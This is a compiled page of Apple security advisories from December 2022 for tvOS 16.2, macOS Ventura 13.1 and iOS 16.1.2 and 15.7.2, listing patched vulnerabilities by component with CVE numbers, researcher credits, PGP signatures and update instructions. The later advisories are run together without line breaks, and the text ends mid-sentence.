Apple Security Advisory 2022-12-13-7 - tvOS 16.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-7 tvOS 16.2

tvOS 16.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213535.

Accounts  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed with improved data protection.  
CVE-2022-42843: Mickey Jin (@patch1t)

AppleAVD  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Parsing a maliciously crafted video file may lead to kernel  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

AppleMobileFileIntegrity  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing

AVEVideoEncoder  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A logic issue was addressed with improved checks.  
CVE-2022-42848: ABC Research s.r.o

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing a maliciously crafted file may lead to arbitrary  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46693: Mickey Jin (@patch1t)

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Parsing a maliciously crafted TIFF file may lead to  
disclosure of user information  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42851: Mickey Jin (@patch1t)

IOHIDFamily  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-42864: Tommy Muir (@Muirey03)

IOMobileFrameBuffer  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46690: John Aakerblom (@jaakerblom)

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with additional  
validation.  
CVE-2022-46689: Ian Beer of Google Project Zero

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Connecting to a malicious NFS server may lead to arbitrary  
code execution with kernel privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-46701: Felix Poulin-Belanger

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause kernel code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42845: Adam Doupé of ASU SEFCOM

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

Preferences  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to use arbitrary entitlements  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-42855: Ivan Fratric of Google Project Zero

Safari  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: A spoofing issue existed in the handling of URLs. This  
issue was addressed with improved input validation.  
CVE-2022-46695: KirtiKumar Anandrao Ramchandani

Software Update  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A user may be able to elevate privileges  
Description: An access issue existed with privileged API calls. This  
issue was addressed with additional restrictions.  
CVE-2022-42849: Mickey Jin (@patch1t)

Weather  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-42866: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may result in the  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved checks.  
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited against versions of iOS released  
before iOS 15.1.  
Description: A type confusion issue was addressed with improved state  
handling.  
WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

Additional recognition

Kernel  
We would like to acknowledge Zweig of Kunlun Lab for their  
assistance.

Safari Extensions  
We would like to acknowledge Oliver Dunk and Christian R. of  
1Password for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher and scarlet for  
their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke  
NxkItA/+LIwJ66Odl7Uwp1N/qek5Z/TBuPKlbgTwRZGT3LBVMVmyHTBzebA88aNq  
Pae1RKQ2Txw4w9Tb7a08eeqRQD51MBoSjTxf23tO1o0B1UR3Hgq3gsOSjh/dTq9V  
Jvy4DpO15xdVHP3BH/li114JpgR+FoD5Du0rPffL01p6YtqeWMSvnRoCmwNcIqou  
i2ZObfdrL2WJ+IiDIlMoJ3v+B1tDxOWR6Mn37iRdzl+QgrQMQtP9pSsiAPCntA+y  
eFM5Hp0JlOMtCfA+xT+LRoZHCbjTCFMRlRbNffGvrNwwdTY4MXrSYlKcIo3yFT2m  
KSHrQNvqzWhmSLAcHlUNo0lVvtPAlrgyilCYaeRNgRC1+x8KRf/AcErXr23oKknJ  
lzIF6eVk1K3mxUmR+M+P8+cr14pbrUwJcQlm0In6/8fUulHtcElLE3fJ+HJVImx8  
RtvNmuCng5iEK1zlwgDvAKO3EgMrMtduF8aygaCcBmt65GMkHwvOGCDXcIrKfH9U  
sP4eY7V3t4CQd9TX3Vlmt47MwRTSVuUtMcQeQPhEUTdUbM7UlvtW8igrLvkz9uPn  
CpuE2mzhd/dJANXvMFBR9A0ilAdJO1QD/uSWL+UbKq4BlyiW5etd8gObQfHqqW3C  
sh0EwxLh4ATicRS9btAJMwIfK/ulYDWp4yuIsUamDj/sN9xWvXY=  
=i2O9  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-7

Apple Security Advisory 2022-12-13-4 - macOS Ventura 13.1 addresses bypass, code execution, out of bounds access, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-4 macOS Ventura 13.1

macOS Ventura 13.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213532.

Accounts  
Available for: macOS Ventura  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed with improved data protection.  
CVE-2022-42843: Mickey Jin (@patch1t)

AMD  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-42847: ABC Research s.r.o.

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing

Bluetooth  
Available for: macOS Ventura  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42854: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Boot Camp  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file  
system  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2022-42853: Mickey Jin (@patch1t) of Trend Micro

CoreServices  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: Multiple issues were addressed by removing the  
vulnerable code.  
CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of  
Offensive Security

DriverKit  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de)

ImageIO  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted file may lead to arbitrary  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46693: Mickey Jin (@patch1t)

IOHIDFamily  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-42864: Tommy Muir (@Muirey03)

IOMobileFrameBuffer  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46690: John Aakerblom (@jaakerblom)

IOMobileFrameBuffer  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-46697: John Aakerblom (@jaakerblom) and Antonio Zekic  
(@antoniozekic)

iTunes Store  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An issue existed in the parsing of URLs. This issue was  
addressed with improved input validation.  
CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with additional  
validation.  
CVE-2022-46689: Ian Beer of Google Project Zero

Kernel  
Available for: macOS Ventura  
Impact: Connecting to a malicious NFS server may lead to arbitrary  
code execution with kernel privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-46701: Felix Poulin-Belanger

Kernel  
Available for: macOS Ventura  
Impact: A remote user may be able to cause kernel code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with improved checks.  
CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

Kernel  
Available for: macOS Ventura  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42845: Adam Doupé of ASU SEFCOM

Photos  
Available for: macOS Ventura  
Impact: Shake-to-undo may allow a deleted photo to be re-surfaced  
without authentication  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32943: an anonymous researcher

ppp  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42840: an anonymous researcher

Preferences  
Available for: macOS Ventura  
Impact: An app may be able to use arbitrary entitlements  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-42855: Ivan Fratric of Google Project Zero

Printing  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-42862: Mickey Jin (@patch1t)

Ruby  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-24836  
CVE-2022-29181

Safari  
Available for: macOS Ventura  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: A spoofing issue existed in the handling of URLs. This  
issue was addressed with improved input validation.  
CVE-2022-46695: KirtiKumar Anandrao Ramchandani

Weather  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-42866: an anonymous researcher

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may result in the  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved checks.  
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited against versions of iOS released  
before iOS 15.1.  
Description: A type confusion issue was addressed with improved state  
handling.  
WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

xar  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted package may lead to  
arbitrary code execution  
Description: A type confusion issue was addressed with improved  
checks.  
CVE-2022-42841: Thijs Alkemade (@xnyhps) of Computest Sector 7

Additional recognition

Kernel  
We would like to acknowledge Zweig of Kunlun Lab for their  
assistance.

Lock Screen  
We would like to acknowledge Kevin Mann for their assistance.

Safari Extensions  
We would like to acknowledge Oliver Dunk and Christian R. of  
1Password for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher and scarlet for  
their assistance.

macOS Ventura 13.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYAACgkQ4RjMIDke  
Nxk1zRAAuqDsK19ODzl+oIO6xYMDcbiQV/ibvU9uwLtwTR8Y2wLga9V/vaaPTS6z  
qRkTivKEfdLMVW8Xlzl1jb+BMS0+dIjYrPAFatU8A5H2A3MLY5Trl9tTs+D8BgQJ  
reLRAyR6qJVwu+VMMjgrUxkQliPNYeumrmLwmKJdByYPzv4GLY5bOIf6siUAIJdB  
vs2zzcq6+BnoJkS1iYa+Ub5S3bSryR2i8vrSit6PcYBtLKHxUJaK2YBdA8LoqB4J  
wenkEaEhyilm0bpyyF0VxDuvOcotqrGa2ikScrik/N/NueMqDi9duo9kKKVia0xa  
Gx2cYLNDG10KBmz9w9B8YC6lNa6t7M5zmCYn8TmXTfndd7fCYbYajZNT0WxIYteK  
sXYPkVpqEd4KVZxtQ3MfHlx5y4FwnqBkLACnfsNCs4KatbJPEg9Qy9Mn2ymi/9He  
UoVt3XnQVhAgGIRV2qezjV9r0rtgnWpSKvFd9LSDcB9F6b/bzRipbxVnqdWCL1If  
ymeeEY8BJ7WJnFqgXzRo42+4bp4R67iNH+Z/JjUy/Z7C3f2O66fFZu2pNL1vLILA  
Wi/dprF13SjqCIavwWPbVL8UvfaAwBz53y38gwei6eSdsEO383r0XIIKjErGbWm6  
hqHq/QKTWHQZqUFj4kUb4Ajw8Qe0j0qSrCLt4Wl11u/0r5hTRyI=  
=C5EK  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-4

Apple Security Advisory 2022-12-13-3 - iOS 16.1.2 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-12-13-3 iOS 16.1.2iOS 16.1.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213516.WebKitAvailable for: iPhone 8 and laterImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited against versions of iOS releasedbefore iOS 15.1.Description: A type confusion issue was addressed with improved statehandling.WebKit Bugzilla: 248266CVE-2022-42856: Clément Lecigne of Google's Threat Analysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.1.2".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYEACgkQ4RjMIDkeNxll4hAAolqnH+W3gE3w2Xri3wUchwkj6WPhfWcwwc+l0cxUxiDqzhGSkW4kNTVIeCjENaJ4WfsK7COfxx8qnmQtcqV8P406XtDomeE96Rm/euCEzkSpVPSs4S8+YwvOqRNWVbWmWQ1gKFSqkuZb2Y5IAnA+KI3Fw1M1iq8Cbs/bkUVjNfrIrrPgl19BercEOjsjq+BQS15dIq84GUiSv/KTU31NKMeSQLB8O9+u91tuBex2b+1mdwb15K1R17OIe/exVA2qnQFctfhWu2uh2izckATylQjtvQHMr0pAwdEoLyRl1xXrW62DeVwWBsn0bxUhjSfS/clmXyN/hL1ocgUrHrI9yAVST5oug/LqR8RjTkgTBcGF9C0YMXaexvA0y2AhF70pl67UESleBSRddayFAW2lZkV/YdJosxGLsRviy8jdiiQ4VJ5xI9TAECbUGgF2qHVSz4gnlyyDUfUqHUmjLej48qCMbadY4IQQmvW30yiCW+shHfaLzCBYZ2cLhUCD7IqU7C1+KE+bJ1Y/k7EXOkLWhZ9go7kKUF6OfpVd6OPIYd4R38eghUXU4ZviQwYQlkXm1Q+DZrwaOvMf0kMkCA/10ktuzhKSpiCI/47BqcE8VYi0CCbOUaSZSPi6P0jlpuIsxCd1UKkGaTsfdJIyeNY1VPHkiOl2BYpIelCqqhOiNHc==wMpD-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-3

Apple Security Advisory 2022-12-13-2 - iOS 15.7.2 and iPadOS 15.7.2 addresses bypass, code execution, integer overflow, out of bounds write, and spoofing vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-12-13-2 iOS 15.7.2 and iPadOS 15.7.2iOS 15.7.2 and iPadOS 15.7.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213531.AppleAVDAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Parsing a maliciously crafted video file may lead to kernelcode executionDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-46694: Andrey Labunets and Nikita TarakanovAVEVideoEncoderAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A logic issue was addressed with improved checks.CVE-2022-42848: ABC Research s.r.oFile SystemAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to break out of its sandboxDescription: This issue was addressed with improved checks.CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-YearLabGraphics DriverAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Parsing a maliciously crafted video file may lead tounexpected system terminationDescription: The issue was addressed with improved memory handling.CVE-2022-42846: Willy R. Vasquez of The University of Texas at AustinIOHIDFamilyAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A race condition was addressed with improved statehandling.CVE-2022-42864: Tommy Muir (@Muirey03)iTunes StoreAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: An issue existed in the parsing of URLs. This issue wasaddressed with improved input validation.CVE-2022-42837: Weijia Dai (@dwj1210) of Momo SecurityKernelAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A race condition was addressed with additionalvalidation.CVE-2022-46689: Ian Beer of Google Project Zerolibxml2Available for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: An integer overflow was addressed through improved inputvalidation.CVE-2022-40303: Maddie Stone of Google Project Zerolibxml2Available for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: This issue was addressed with improved checks.CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google ProjectZeropppAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2022-42840: an anonymous researcherPreferencesAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: An app may be able to use arbitrary entitlementsDescription: A logic issue was addressed with improved statemanagement.CVE-2022-42855: Ivan Fratric of Google Project ZeroSafariAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Visiting a website that frames malicious content may lead toUI spoofingDescription: A spoofing issue existed in the handling of URLs. Thisissue was addressed with improved input validation.CVE-2022-46695: KirtiKumar Anandrao RamchandaniWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory consumption issue was addressed with improvedmemory handling.WebKit Bugzilla: 245466CVE-2022-46691: an anonymous researcherWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Processing maliciously crafted web content may result in thedisclosure of process memoryDescription: The issue was addressed with improved memory handling.CVE-2022-42852: hazbinhotel working with Trend Micro Zero DayInitiativeWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Processing maliciously crafted web content may bypass SameOrigin PolicyDescription: A logic issue was addressed with improved statemanagement.WebKit Bugzilla: 246783CVE-2022-46692: KirtiKumar Anandrao RamchandaniWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory corruption issue was addressed with improvedinput validation.WebKit Bugzilla: 247562CVE-2022-46700: Samuel Groß of Google V8 SecurityWebKitAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhoneSE (1st generation), iPad Pro (all models), iPad Air 2 and later,iPad 5th generation and later, iPad mini 4 and later, and iPod touch(7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited against versions of iOS releasedbefore iOS 15.1.Description: A type confusion issue was addressed with improved statehandling.WebKit Bugzilla: 248266CVE-2022-42856: Clément Lecigne of Google's Threat Analysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton 